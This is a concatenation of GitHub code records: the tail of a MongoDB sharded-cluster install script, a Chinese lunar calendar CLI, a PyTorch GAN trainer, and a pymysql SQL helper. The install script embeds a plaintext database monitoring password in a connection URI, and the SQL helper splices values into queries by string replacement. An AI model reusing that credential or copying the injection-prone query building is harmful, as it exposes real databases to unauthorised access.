'r') as fr:\n config_yaml = yaml.safe_load(fr)\n config_yaml['systemLog']['path'] = f\"{self.cnfdir}/config.log\"\n config_yaml['processManagement']['pidFilePath'] = f\"{self.cnfdir}/config.pid\"\n config_yaml['net']['port'] = self.mongoport\n config_yaml['net']['unixDomainSocket']['pathPrefix'] = self.cnfdir\n config_yaml['storage']['dbPath'] = self.datadir\n if self.mongocachesize:\n config_yaml['storage']['wiredTiger']['engineConfig']['cacheSizeGB'] = self.mongocachesize\n else:\n config_yaml['storage']['wiredTiger']['engineConfig']['cacheSizeGB'] = cachesize\n config_yaml['replication']['oplogSizeMB'] = sizemb\n config_yaml['replication']['replSetName'] = f'{self.mongoreplname}-configs'\n config_yaml['sharding']['clusterRole'] = 'configsvr'\n if not grouphosts.index(f'{ip}:{self.mongoport}') == 0:\n config_yaml['security'] = {}\n config_yaml['security']['keyFile'] = f'{self.perfix}/mongodb-keyfile'\n config_yaml['security']['authorization'] = 'enabled'\n with open(f'{self.cnfdir}/config.conf', 'w+', encoding='utf-8') as fw:\n yaml.safe_dump(config_yaml, fw)\n logger.info(\"创建用户和文件授权\")\n subprocess.call(\"useradd -M -s /sbin/nologin mongo\", shell=True)\n subprocess.call(\"chown -R mongo.mongo {0}\".format(self.perfix), shell=True)\n logger.info(\"启动数据库\")\n subprocess.call(\"sudo -u mongo /usr/bin/numactl --interleave=all 
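# --- Added note on the config handling in mongo_install.py above ---
# init_db/init_config are load-modify-dump round trips over YAML templates;
# the pattern in isolation (hypothetical paths and values):
import yaml

with open('mongo.conf-default', encoding='utf-8') as fr:
    conf = yaml.safe_load(fr)
conf['net']['port'] = 27018
conf.setdefault('security', {})['authorization'] = 'enabled'
with open('mongo.conf', 'w', encoding='utf-8') as fw:
    yaml.safe_dump(conf, fw)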
{0}/bin/mongod -f {1}/config.conf\"\n .format(self.perfix, self.cnfdir), shell=True)\n\n def init_mongos(self, grouphosts):\n #这里的grouphosts的指config的地址,需要写到配置文件中,详情参考mongos的配置文档\n logger.info(\"修改mongos.conf文件\")\n with open('/root/mongo-pkg/mongos.conf-default', 'r') as fr:\n mongos_yaml = yaml.safe_load(fr)\n mongos_yaml['systemLog']['path'] = f\"{self.cnfdir}/mongos.log\"\n mongos_yaml['processManagement']['pidFilePath'] = f\"{self.cnfdir}/mongos.pid\"\n mongos_yaml['net']['port'] = self.mongoport\n mongos_yaml['net']['unixDomainSocket']['pathPrefix'] = f\"{self.cnfdir}\"\n hosts = ','.join(grouphosts)\n mongos_yaml['sharding']['configDB'] = f\"{self.mongoreplname}-configs/{hosts}\"\n mongos_yaml['security'] = {}\n mongos_yaml['security']['keyFile'] = f'{self.perfix}/mongodb-keyfile'\n with open(f'{self.cnfdir}/mongos.conf', 'w+', encoding='utf-8') as fw:\n yaml.safe_dump(mongos_yaml, fw)\n logger.info(\"创建用户和文件授权\")\n subprocess.call(\"useradd -M -s /sbin/nologin mongo\", shell=True)\n subprocess.call(\"chown -R mongo.mongo {0}\".format(self.perfix), shell=True)\n logger.info(\"启动数据库\")\n subprocess.call(\"sudo -u mongo /usr/bin/numactl --interleave=all {0}/bin/mongos -f {1}/mongos.conf\"\n .format(self.perfix, self.cnfdir), shell=True)\n if not os.path.exists(\"/usr/bin/mongo\"):\n os.symlink(f\"{self.perfix}/bin/mongo\", \"/usr/bin/mongo\")\n\n def create_pk_db(self, grouphosts, groups):\n if grouphosts.index(f'{ip}:{self.mongoport}') == 0:\n logger.info(\"初始化集群分片信息\")\n logger.debug(f\"集群成员:{grouphosts}, 集群名称:{self.mongoreplname}\")\n usertext = \"db.createUser({ user: 'root', pwd: '****', roles: [ { role: 'root', db: 'admin'} ]})\"\n if self.cluster_mode:\n config = {'_id': f'{self.mongoreplname}-shard0{groups}', 'members': [{'_id': 0, 'host': grouphosts[0]}]}\n else:\n config = {'_id': self.mongoreplname, 'members': [{'_id': 0, 'host': grouphosts[0]}]}\n subprocess.call(f\"echo \\\"rs.initiate({config})\\nsleep(5000)\\n{usertext}\\ndb.shutdownServer()\\\" | \\\n {self.perfix}/bin/mongo 127.0.0.1:{self.mongoport}/admin\", shell=True)\n logger.info(\"重启添加配置文件\")\n with open(f'{self.cnfdir}/mongo.conf', 'r') as fr:\n mongo_yaml = yaml.safe_load(fr)\n mongo_yaml['security'] = {}\n mongo_yaml['security']['keyFile'] = f'{self.perfix}/mongodb-keyfile'\n mongo_yaml['security']['authorization'] = 'enabled'\n with open(f'{self.cnfdir}/mongo.conf', 'w+', encoding='utf-8') as fw:\n yaml.safe_dump(mongo_yaml, fw)\n subprocess.call(\"sudo -u mongo /usr/bin/numactl --interleave=all {0}/bin/mongod -f {1}/mongo.conf\"\n .format(self.perfix, self.cnfdir), shell=True)\n logger.info(\"添加机器到副本集中\")\n for _ in range(60):\n if not False in [ self.check_port(i) for i in grouphosts ]:\n for z in grouphosts[1::]:\n logger.debug(f\"添加机器:{z}\")\n subprocess.call(f\"echo \\\"rs.add('{z}')\\\" | {self.perfix}/bin/mongo 127.0.0.1:{self.mongoport}/admin \\\n -uroot -p****\", shell=True)\n subprocess.call(f\"{self.perfix}/bin/mongorestore --host 127.0.0.1 --port {self.mongoport} -uroot\\\n -p**** --archive=/root/mongo-pkg/user.arch\", shell=True)\n subprocess.call(f\"echo \\\"db.dropUser('root')\\\" | \\\n {self.perfix}/bin/mongo 127.0.0.1:{self.mongoport}/admin -uroot -p****\", shell=True)\n break\n else:\n time.sleep(3)\n\n def create_pk_config(self, grouphosts):\n if grouphosts.index(f'{ip}:{self.mongoport}') == 0:\n logger.info(\"初始化集群配置服信息\")\n logger.debug(f\"集群成员:{grouphosts}\")\n usertext = \"db.createUser({ user: 'root', pwd: '****', roles: [ { role: 'root', db: 'admin'} ]})\"\n config = {'_id': 
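# --- Added note on the `echo ... | mongo` shell pipelines above ---
# subprocess.run can feed the mongo shell through `input=` instead of piping an
# echoed string through shell=True, avoiding the quoting gymnastics
# (binary path and command hypothetical):
import subprocess

subprocess.run(['/opt/mongo/bin/mongo', '127.0.0.1:27017/admin'],
               input='rs.status()\n', text=True, check=False)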
f'{self.mongoreplname}-configs', 'members': [{'_id': 0, 'host': grouphosts[0]}]}\n subprocess.call(f\"echo \\\"rs.initiate({config})\\nsleep(5000)\\n{usertext}\\ndb.shutdownServer()\\\" | \\\n {self.perfix}/bin/mongo 127.0.0.1:{self.mongoport}/admin\", shell=True)\n logger.info(\"重启添加配置文件\")\n with open(f'{self.cnfdir}/config.conf', 'r') as fr:\n config_yaml = yaml.safe_load(fr)\n config_yaml['security'] = {}\n config_yaml['security']['keyFile'] = f'{self.perfix}/mongodb-keyfile'\n config_yaml['security']['authorization'] = 'enabled'\n with open(f'{self.cnfdir}/config.conf', 'w+', encoding='utf-8') as fw:\n yaml.safe_dump(config_yaml, fw)\n subprocess.call(\"sudo -u mongo /usr/bin/numactl --interleave=all {0}/bin/mongod -f {1}/config.conf\"\n .format(self.perfix, self.cnfdir), shell=True)\n logger.info(\"添加机器到副本集中\")\n for _ in range(60):\n if not False in [ self.check_port(i) for i in grouphosts ]:\n for z in grouphosts[1::]:\n logger.debug(f\"添加机器:{z}\")\n subprocess.call(f\"echo \\\"rs.add('{z}')\\\" | {self.perfix}/bin/mongo 127.0.0.1:{self.mongoport}/admin \\\n -uroot -p****\", shell=True)\n break\n else:\n time.sleep(3)\n\n def create_pk_mongos(self, grouphosts):\n #grouphosts只指mongos的机器,与init不同\n if grouphosts.index(f'{ip}:{self.mongoport}') == 0:\n logger.info(\"初始化集群路由信息\")\n logger.debug(f\"集群成员:{grouphosts}\")\n for w in range(60):\n if not False in [ self.check_port(i) for i in self.createdb ]:\n for x,y in enumerate(self.host_roles['db']):\n config = ','.join(y)\n subprocess.call(f\"echo \\\"sh.addShard('{self.mongoreplname}-shard0{x}/{config}')\\\" |\\\n {self.perfix}/bin/mongo 127.0.0.1:{self.mongoport}/admin -uroot -p****\", shell=True)\n subprocess.call(f\"{self.perfix}/bin/mongorestore --host 127.0.0.1 --port {self.mongoport} -uroot\\\n -p**** --archive=/root/mongo-pkg/user.arch\", shell=True)\n subprocess.call(f\"echo \\\"db.dropUser('root')\\\" | \\\n {self.perfix}/bin/mongo 127.0.0.1:{self.mongoport}/admin -uroot -p****\", shell=True)\n break\n else:\n if w == 59:\n logger.error(\"请检查集群所有成员状态是否正常\")\n else:\n time.sleep(3)\n\n def deploy_env(self):\n global cachesize, sizemb\n cachesize = int(psutil.virtual_memory().total / 1024 / 1024 / 1024 * 0.7)\n sizemb = round(psutil.disk_usage(f'{self.perfix}').total / 1024 / 1024 / 1024 * 0.05) * 1024\n if not os.path.exists(os.path.join(self.perfix, 'mongodb-keyfile')):\n shutil.copy('/root/mongo-pkg/mongodb-keyfile', self.perfix)\n subprocess.call(f\"chmod 400 {self.perfix}/mongodb-keyfile\", shell=True)\n shutil.copy('/root/mongo-pkg/mongod_service.sh', self.perfix)\n self.sorted_hosts()\n dbs = [ i for i,x in enumerate(self.host_roles['db']) if f'{ip}:{self.mongoport}' in x ]\n if f'{ip}:{self.mongoport}' in self.host_roles['config']:\n self.init_config(self.host_roles['config'])\n self.create_pk_config(self.host_roles['config'])\n self.init_monitor(self.host_roles['config'])\n elif f'{ip}:{self.mongoport}' in self.host_roles['mongos']:\n self.init_mongos(self.host_roles['config'])\n self.create_pk_mongos(self.host_roles['mongos'])\n self.init_backup(self.host_roles['mongos'])\n else:\n if dbs:\n self.init_db(self.host_roles['db'][dbs[0]], dbs[0])\n self.create_pk_db(self.host_roles['db'][dbs[0]], dbs[0])\n self.init_monitor(self.host_roles['db'][dbs[0]])\n if not os.path.exists(\"/usr/bin/mongo\"):\n os.symlink(f\"{self.perfix}/bin/mongo\", \"/usr/bin/mongo\")\n\n def init_backup(self, grouphosts):\n if not self.skip_backups and f\"{ip}:{self.mongoport}\" == grouphosts[-1]:\n logger.info(\"添加mongodb备份\")\n 
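# --- Added note on the resource sizing in deploy_env above ---
# cachesize and sizemb come from host RAM and disk via psutil; the same calls
# stand-alone (70% of RAM in GiB for the cache, 5% of the volume as oplog MiB):
import psutil

cache_gb = int(psutil.virtual_memory().total / 1024 ** 3 * 0.7)
oplog_mb = round(psutil.disk_usage('/').total / 1024 ** 3 * 0.05) * 1024
print(cache_gb, oplog_mb)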
shutil.copy('/root/mongo-pkg/backup.py', self.perfix)\n if self.uploadtype == 'minio':\n shutil.copy('/root/mongo-pkg/upload-minio.py', '/usr/games/upload.py')\n elif self.uploadtype == 'ali':\n shutil.copy('/root/mongo-pkg/upload-ali.py', '/usr/games/upload.py')\n elif self.uploadtype == 'aws':\n subprocess.call(\"pip3 install boto3\", shell=True)\n shutil.copy('/root/mongo-pkg/upload-aws.py', '/usr/games/upload.py')\n subprocess.call(\"chmod +x /usr/games/upload.py\", shell=True)\n if self.uploadtype == 'local':\n clearday = 5\n upcycle = 0\n else:\n clearday = 3\n upcycle = 1\n my_cron = CronTab(user='root')\n iter = list(my_cron.find_command(re.compile(f\"127.0.0.1 (.*) {self.mongoport}\")))\n if not iter:\n command = (f\"/usr/bin/python3 {self.perfix}/backup.py --host 127.0.0.1 --port {self.mongoport} \"\n f\"--clearday {clearday} --upcycle {upcycle}\")\n job = my_cron.new(command=command)\n job.set_comment(\"mongo数据备份\")\n job.setall('00 04 * * *')\n my_cron.write()\n\n def init_monitor(self, grouphosts):\n logger.info(\"安装mongodb_exporter\")\n if not os.path.exists('/usr/bin/mongodb_exporter'):\n shutil.copy('/root/mongo-pkg/mongodb_exporter', '/usr/bin')\n if not self.skip_monitors and f\"{ip}:{self.mongoport}\" == grouphosts[-1]:\n cfg2 = ConfigParser()\n if not os.path.exists('/etc/supervisord.d'):\n os.makedirs('/etc/supervisord.d')\n if not os.path.exists('/etc/supervisord.d/supervisord.conf'):\n cfg2.read('/root/mongo-pkg/supervisord.conf')\n else:\n cfg2.read('/etc/supervisord.d/supervisord.conf')\n urls = ','.join(grouphosts)\n mongourl = f\"mongodb://monitoruser:oA4Pl5Usgr1sc@{urls}\"\n cfg2[f'program:mongo_export{self.mongoport}'] = {}\n cfg2.set(f'program:mongo_export{self.mongoport}', 'command',\n f'/usr/bin/mongodb_exporter --mongodb.uri={mongourl}')\n cfg2.set(f'program:mongo_export{self.mongoport}', 'autostart', 'true')\n cfg2.set(f'program:mongo_export{self.mongoport}', 'startsecs', '10')\n cfg2.set(f'program:mongo_export{self.mongoport}', 'autorestart', 'true')\n cfg2.set(f'program:mongo_export{self.mongoport}', 'startretries', '3')\n cfg2.set(f'program:mongo_export{self.mongoport}', 'user', 'mongo')\n cfg2.set(f'program:mongo_export{self.mongoport}', 'priority', '999')\n cfg2.set(f'program:mongo_export{self.mongoport}', 'redirect_stderr', 'true')\n cfg2.set(f'program:mongo_export{self.mongoport}', 'stdout_logfile_maxbytes', '20MB')\n cfg2.set(f'program:mongo_export{self.mongoport}', 'stdout_logfile_backups', '20')\n cfg2.set(f'program:mongo_export{self.mongoport}', 'stdout_logfile', f'{self.cnfdir}/monitor.log')\n cfg2.set(f'program:mongo_export{self.mongoport}', 'stopasgroup', 'false')\n cfg2.set(f'program:mongo_export{self.mongoport}', 'killasgroup', 'false')\n with open('/etc/supervisord.d/supervisord.conf', 'w+') as fw2:\n cfg2.write(fw2)\n if os.path.exists('/etc/supervisord.d/supervisord.pid'):\n subprocess.call(\"/usr/local/bin/supervisorctl -c /etc/supervisord.d/supervisord.conf reload\", shell=True)\n else:\n subprocess.call(\"/usr/local/bin/supervisord -c /etc/supervisord.d/supervisord.conf\", shell=True)\n\n def main(self):\n self.sorted_hosts()\n logger.debug(f\"主机列表:{self.createdb}\")\n if f\"{ip}:{self.mongoport}\" in self.createdb:\n self.minio_get()\n self.deploy_env()\n else:\n logger.error(\"找不到主机\")\n\nif __name__ == '__main__':\n logger.add(f'/tmp/install_mongodb.log', level='DEBUG',\n format='{time:YYYY-MM-DD
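# --- Added note on the python-crontab registration in init_backup above ---
# The same find-or-create pattern in isolation (current-user crontab and a
# hypothetical command instead of root's):
from crontab import CronTab

cron = CronTab(user=True)
if not list(cron.find_command('backup.py')):
    job = cron.new(command='/usr/bin/python3 /opt/mongo/backup.py')
    job.setall('00 04 * * *')
    job.set_comment('mongo backup')
    cron.write()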
HH:mm:ss} | {level} | {message}')\n args = get_apt()\n ip = get_host_ip()\n install = Install_Mongodb(args)\n install.main()\n","repo_name":"doctors-note/-Automatic-deployment-mysql","sub_path":"mongo_install.py","file_name":"mongo_install.py","file_ext":"py","file_size_in_byte":25828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"11404102138","text":"# ===============================================\n# ===============================================\n# *\\src\\py_lib\\tltime.py\n# ===============================================\n# ===============================================\n#\n# tool to show local time now\n\n#import tensorflow as tf\n# tensorflow is no longer used\n\nimport argparse\n\nimport time\nimport datetime\nimport sxtwl\n\n\nGan = [\"甲\" , \"乙\" , \"丙\" , \"丁\" , \"戊\" , \"己\" , \"庚\" , \"辛\" , \"壬\" , \"癸\"]\n# 天干\n\nZhi = [\"子\" , \"丑\" , \"寅\" , \"卯\" , \"辰\" , \"巳\" , \"午\" , \"未\" , \"申\" , \"酉\" , \"戌\" , \"亥\"]\n# 地支\n\nShX = [\"鼠\" , \"牛\" , \"虎\" , \"兔\" , \"龙\" , \"蛇\" , \"马\" , \"羊\" , \"猴\" , \"鸡\" , \"狗\" , \"猪\"]\n# 生肖\n\nnumCn = [\"零\" , \"一\" , \"二\" , \"三\" , \"四\" , \"五\" , \"六\" , \"七\" , \"八\" , \"九\" , \"十\"]\n# 中文数字\n\njqmc = [\"冬至\" , \"小寒\" , \"大寒\" , \"立春\" , \"雨水\" , \"惊蛰\" , \"春分\" , \"清明\" , \"谷雨\" , \"立夏\" ,\n \"小满\" , \"芒种\" , \"夏至\" , \"小暑\" , \"大暑\" , \"立秋\" , \"处暑\" , \"白露\" , \"秋分\" , \"寒露\" ,\n \"霜降\" , \"立冬\" , \"小雪\" , \"大雪\"]\n# 节气\n\nMonCn = [\"正月\" , \"二月\" , \"三月\" , \"四月\" , \"五月\" , \"六月\" , \"七月\" , \"八月\" , \"九月\" , \"十月\" , \"十一月\" , \"腊月\"]\n# 农历月\n\nDayCn = [\"初一\" , \"初二\" , \"初三\" , \"初四\" , \"初五\" , \"初六\" , \"初七\" , \"初八\" , \"初九\" , \"初十\" , \n \"十一\" , \"十二\" , \"十三\" , \"十四\" , \"十五\" , \"十六\" , \"十七\" , \"十八\" , \"十九\" , \"二十\" , \n \"廿一\" , \"廿二\" , \"廿三\" , \"廿四\" , \"廿五\" , \"廿六\" , \"廿七\" , \"廿八\" , \"廿九\" , \"三十\" ,\n \"卅一\"]\n# 农历日\n\nWeekCn = [\"星期日\" , \"星期一\" , \"星期二\" , \"星期三\" , \"星期四\" , \"星期五\" , \"星期六\"]\n# 星期\n\n# tensorflow is no longer used to decode shell-command\n#\\code\n#\n# tf.app.flags.DEFINE_bool( 'system_time' , False , 'show system_time' )\n# tf.app.flags.DEFINE_bool( 'chinese_calendar' , False , 'show chinese_calendar' )\n#\n# FLAGS = tf.app.flags.FLAGS\n#\n#\\endcode\n\nparser = argparse.ArgumentParser( description = 'manual to this script' )\n\nparser.add_argument( '--timestamp' , type = bool , default = False )\nparser.add_argument( '--chinese_calendar' , type = bool , default = False )\n# add args definition\n\nargs = parser.parse_args()\n# save read-in args to val args\n\nprint()\n# print begin NULL line\n\ntoday = datetime.datetime.today()\n# datetime module: get today\n\nprint( \"> 现在时间:\" , time.strftime( '%Y-%m-%d %H:%M:%S' , time.localtime() ) , WeekCn[today.isoweekday()] )\n# print local time in format \"Y-M-D H:M:S\" and weekday ↓\n# isoweekday begin with 0 end with 6\n\nif args.chinese_calendar:\n\n# CC_today = sxtwl.fromSolar( 2020 , 6 , 20 )\n # debug line, test CC_month (测试农历闰月 2020.6.20为农历庚子年闰四月廿九)\n\n# CC_today = sxtwl.fromSolar( 2022 , 10 , 8 )\n # debug line, test chinese_calendar print (测试节气输出 2022.10.8为壬寅年九月十三 节气为寒露)\n\n CC_today = sxtwl.fromSolar( today.year , today.month , today.day ) # chinese_calendar today\n\n CC_year = CC_today.getYearGZ( True ) # chinese_calendar year\n\n CC_month = \"%s%s\" % ( '闰' if CC_today.isLunarLeap() # 判断闰月\n else '' , \n MonCn[CC_today.getLunarMonth()-1] )\n # chinese_calendar month\n # this is a bit complex, therefore here creates direct one string\n\n CC_day = 
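# --- Added note on the sxtwl lunar-calendar calls in tltime.py above ---
# Solar-to-lunar conversion in isolation, using only calls that appear in that
# script (Gan/Zhi/MonCn/DayCn are the lookup tables it defines):
import sxtwl

d = sxtwl.fromSolar(2022, 10, 8)
gz = d.getYearGZ(True)
label = Gan[gz.tg] + Zhi[gz.dz] + '年'
label += ('闰' if d.isLunarLeap() else '') + MonCn[d.getLunarMonth() - 1]
label += DayCn[d.getLunarDay() - 1]
print(label)  # 壬寅年九月十三, per the script's own debug note for 2022-10-08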
CC_today.getLunarDay() # chinese_calendar day\n\n# print( Gan[CC_year.tg] + Zhi[CC_year.dz] + \"年\" + CC_month + DayCn[CC_day-1] )\n # debug line\n\n print( \"> 农历\" + Gan[CC_year.tg] + Zhi[CC_year.dz] + \"年\" + CC_month + DayCn[CC_day-1] , '%s' % jqmc[CC_today.getJieQi()] if CC_today.hasJieQi() \n else '' )\n # print chinese calendar\n\nif args.timestamp:\n print( \"> 系统时间戳:\" , time.time() )\n # print timestamp\n\nprint()\n# print end NULL line","repo_name":"Ace-Radom/Win_shell_tool_lib","sub_path":"src/py_lib/tltime.py","file_name":"tltime.py","file_ext":"py","file_size_in_byte":4176,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"19324877076","text":"import torch\r\nimport torch.nn as nn\r\nfrom torch.utils.data import DataLoader\r\nimport torchvision as tv\r\nimport numpy as np\r\nimport os\r\nimport random\r\nfrom torch.utils.tensorboard import SummaryWriter\r\n\r\n\r\n\r\nANIME_DATA = './dataset/anime_data/faces/'\r\nEXTRA_DATA = './dataset/extra_data/images/'\r\nmax_iteration = 50000\r\nd_update = 1\r\ng_update = 5\r\nbatch_size = 256\r\nnoise_dim = 100\r\nd_lr = 0.0002\r\ng_lr = 0.0002\r\nsave_every = 20\r\n\r\n# clip weight of D\r\n# use RMSProp instead of Adam\r\n# train more iteration of D\r\n\r\n# only use faces/ images/\r\n\r\nclass Dataset0(torch.utils.data.dataset.Dataset):\r\n def __init__(self, data, transform = None):\r\n self.trainData = data\r\n self.transform = transform\r\n\r\n def __len__(self):\r\n return len(self.trainData)\r\n\r\n def __getitem__(self, idx):\r\n if self.transform:\r\n return self.transform(self.trainData[idx])\r\n return self.trainData[idx]\r\n\r\nclass D(nn.Module):\r\n def __init__(self) -> None:\r\n super().__init__()\r\n self.conv = nn.Sequential(\r\n nn.Conv2d(in_channels=3,out_channels=32,kernel_size=3,padding=1),\r\n nn.BatchNorm2d(32),\r\n nn.ReLU(),\r\n nn.Conv2d(in_channels=32,out_channels=64,kernel_size=5, stride=2, padding=2), #16, 48, 48\r\n nn.BatchNorm2d(64),\r\n nn.ReLU(),\r\n nn.Conv2d(in_channels=64,out_channels=128,kernel_size=5, stride=2,padding=2), #16, 24, 24\r\n nn.BatchNorm2d(128),\r\n nn.ReLU(),\r\n nn.Conv2d(in_channels=128,out_channels=256,kernel_size=5, stride=2,padding=2),\r\n nn.BatchNorm2d(256),\r\n nn.ReLU(),\r\n )\r\n self.fc = nn.Sequential(\r\n nn.Linear(in_features = 8*8*256, out_features=2),\r\n # nn.Sigmoid()\r\n nn.Softmax(dim = 1)\r\n )\r\n\r\n def forward(self, x):\r\n out = self.conv(x)\r\n out = torch.reshape(out, (out.shape[0], -1))\r\n return self.fc(out)\r\n\r\nclass G(nn.Module):\r\n def __init__(self) -> None:\r\n super().__init__()\r\n self.fc = nn.Sequential(\r\n nn.Linear(in_features=noise_dim, out_features=128*16*16)\r\n )\r\n self.conv = nn.Sequential(\r\n nn.ConvTranspose2d(in_channels = 128, out_channels = 128, kernel_size = 5, stride=2, padding=2,output_padding=1),\r\n nn.Conv2d(in_channels=128,out_channels=128,kernel_size=5,padding=2),\r\n nn.BatchNorm2d(128),\r\n nn.LeakyReLU(),\r\n nn.ConvTranspose2d(in_channels = 128, out_channels = 128, kernel_size = 5, stride=2, padding=2,output_padding=1),\r\n nn.Conv2d(in_channels=128,out_channels=64,kernel_size=5,padding=2),\r\n nn.BatchNorm2d(64),\r\n nn.LeakyReLU(),\r\n nn.Conv2d(in_channels=64,out_channels=3,kernel_size=5,padding=2),\r\n nn.Tanh()\r\n )\r\n\r\n def forward(self, x):\r\n x = self.fc(x)\r\n x = torch.reshape(x, (x.shape[0], 128, 16, 16))\r\n return self.conv(x)\r\n\r\ndef train(discriminator, generator, dataloader, device, writer):\r\n discriminator.train()\r\n 
generator.train()\r\n d_optimizer = torch.optim.Adam(discriminator.parameters(), lr = d_lr)\r\n g_optimizer = torch.optim.Adam(generator.parameters(), lr = g_lr)\r\n criterions = nn.BCELoss()\r\n true_labels = torch.ones(batch_size).to(device)\r\n fake_labels = torch.zeros(batch_size).to(device)\r\n mix_labels = torch.cat([true_labels, fake_labels], dim = 0).to(device)\r\n train_d = 0\r\n for i in range(max_iteration):\r\n for iter, (img) in enumerate(dataloader):\r\n real_img = img.to(device)\r\n if iter % d_update == 0:\r\n # if train_d < 1:\r\n reals = discriminator(real_img)\r\n reals = reals[:,1].view(-1)\r\n noises = torch.randn(size = (batch_size, noise_dim)).to(device)\r\n fake_image = generator(noises)\r\n fakes = discriminator(fake_image)\r\n fakes = fakes[:,1].view(-1)\r\n d_loss = criterions(torch.cat([reals, fakes], dim = 0), mix_labels)\r\n d_optimizer.zero_grad()\r\n d_loss.backward()\r\n d_optimizer.step()\r\n loss = d_loss.to('cpu').detach().numpy()\r\n print('d_loss: ', d_loss.to('cpu').detach().numpy())\r\n if loss < 0.001:\r\n train_d = 5\r\n if iter % g_update == 0:\r\n # else:\r\n noises = torch.randn(size = (batch_size, noise_dim)).to(device)\r\n fake_image = generator(noises)\r\n output = discriminator(fake_image)\r\n output = output[:,1].view(-1)\r\n g_loss = criterions(output, true_labels)\r\n g_optimizer.zero_grad()\r\n g_loss.backward()\r\n g_optimizer.step()\r\n loss = g_loss.to('cpu').detach().numpy()\r\n print('g_loss: ', g_loss.to('cpu').detach().numpy())\r\n train_d -= 5\r\n print('out ', i)\r\n noise = torch.randn(size = (batch_size, noise_dim)).to(device)\r\n fake_images = generator(noise)\r\n fake_images += 1\r\n fake_images /=2\r\n fake_images = fake_images.to('cpu')\r\n writer.add_images(tag='title01', img_tensor= fake_images, global_step = i, dataformats='NCHW')\r\n writer.flush()\r\n # 保存模型\r\n if (i + 1) % save_every == 0:\r\n torch.save(discriminator.state_dict(), './' + 'd_{0}.pth'.format(i))\r\n torch.save(generator.state_dict(), './' + 'g_{0}.pth'.format(i))\r\n\r\n\r\ndef test():\r\n discriminator.eval()\r\n generator.eval()\r\n noise = torch.randn(size = (batch_size, noise_dim))\r\n output_images = generator(noise)\r\n # TODO print images\r\n\r\ndef loadData(datapath = ANIME_DATA):\r\n print('Now loading data')\r\n cache_dir = './data_cache.npy'\r\n print(cache_dir)\r\n if os.path.exists(cache_dir):\r\n print('use cache')\r\n return torch.from_numpy(np.load(cache_dir).astype(np.float32))\r\n print('reading...')\r\n images_list = os.listdir(ANIME_DATA)\r\n images = []\r\n for f in images_list:\r\n images.append(torch.unsqueeze(tv.io.read_image(datapath + f, mode = tv.io.ImageReadMode.RGB), dim = 0))\r\n data = torch.cat(images, dim = 0) / 255\r\n print(data.shape)\r\n np.save(cache_dir, data.numpy())\r\n print('cache saved')\r\n return data\r\n\r\nif __name__ == '__main__':\r\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\r\n writer = SummaryWriter(log_dir = 'runs/fashion_mnist_experiment_1')\r\n discriminator = D().to(device)\r\n generator = G().to(device)\r\n # transform\r\n transforms = tv.transforms.Compose([\r\n tv.transforms.Resize([64,64]),\r\n tv.transforms.CenterCrop([64,64]),\r\n tv.transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\r\n ])\r\n training_data = Dataset0(data = loadData(), transform = transforms)\r\n dataloader = DataLoader(training_data, batch_size = batch_size, drop_last=True)\r\n train(discriminator, generator, dataloader, device, writer)\r\n print('done')\r\n 
exit()","repo_name":"zhangchaosd/LearningGAN","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":7131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"6829837746","text":"from tools import gmc_mysql\nfrom data.run_sql import get_result_list\nfrom data import basic_dict\nimport pymysql\nfrom config import config\n\n\nclass RunSql(object):\n \"\"\"\n 获取和执行sql\n \"\"\"\n\n def __init__(self, sql_dict, *args, **kwargs):\n self.dict = sql_dict\n self.sql_string = args\n self.value_dicts = kwargs\n self.db = pymysql.connect(config.get_conf(\"mysql\", \"host\"),\n config.get_conf(\"mysql\", \"username\"),\n config.get_conf(\"mysql\", \"password\"))\n self.sql = []\n\n def run_sql(self):\n \"\"\"\n 连接数据库,执行sql\n \"\"\"\n cursor = self.db.cursor(pymysql.cursors.DictCursor)\n # cursor.execute(sql)\n result = cursor.fetchall()\n self.db.commit()\n self.db.close()\n\n return result\n\n def get_sql_string(self):\n \"\"\"\n 通过方法中传入的字符串获取sql\n \"\"\"\n new_sql = []\n for i in self.sql_string:\n i = get_result_list(i)\n new_sql += i\n return new_sql\n\n def replace_sql(self):\n \"\"\"\n 根据生成的字典,替换sql\n \"\"\"\n sql_list = self.get_sql_string()\n for i in self.value_dicts:\n self.dict[i] = self.value_dicts[i]\n for j in sql_list:\n for s in self.dict:\n if type(self.dict[s]) == int:\n j = j.replace(f\"[{s}]\", f\"{self.dict[s]}\")\n else:\n j = j.replace(f\"[{s}]\", f'\"{self.dict[s]}\"')\n self.sql.append(j)\n\n def get_sql_result(self,*args):\n \"\"\"\n 链接数据库,执行sql\n \"\"\"\n self.replace_sql()\n print(self.sql_string)\n result_list = []\n for i in self.sql:\n print(i)\n result_list += gmc_mysql.get_database(i)\n print(result_list)\n #/app-medical-technology/inspect/outpatient/cancel接口sql查询获取对应参数结果使用\n if self.dict.get(\"return_result_name\" ):\n if self.dict[\"return_result_name\"]==\"inspect_id\":\n result_list = result_list[0][self.dict[\"return_result_name\"]]\n result_list=[(result_list)]\n print(self.dict[\"return_result_name\"])\n else:\n result_list = result_list[0][self.dict[\"return_result_name\"]]\n print(self.dict[\"return_result_name\"])\n return result_list\n\n def validation_sql(self):\n result = self.get_sql_result()\n print(result, self.dict)\n if result:\n for i in result:\n for j in i:\n print(\"对比值\", str(i[j]), str(self.dict[j]))\n if str(i[j]) != str(self.dict[j]):\n return False\n return True\n\n\nif __name__ == '__main__':\n sql_data_dicts = basic_dict.sql_data_dicts\n s = RunSql(sql_data_dicts, \"query_inspect\", order_id=9867276, return_result_name=\"inspect_id\")\n # print(s.get_sql_string())\n print(s.get_sql_result())\n # print(s.validation_sql())","repo_name":"guozhiyan1/HttpRunner","sub_path":"tools/generate_run_sql.py","file_name":"generate_run_sql.py","file_ext":"py","file_size_in_byte":3155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"36843647248","text":"class Solution:\n def minimumXORSum(self, nums1, nums2):\n n = len(nums1)\n\n @cache\n def dp(i, mask):\n if i == n: return 0\n res = float('inf')\n for j in range(n):\n if mask >> j & 1 ^ 1: continue\n res = min(res, (nums1[i] ^ nums2[j]) + dp(i + 1, mask - (1 << j)))\n return res\n\n return dp(0, (1 << 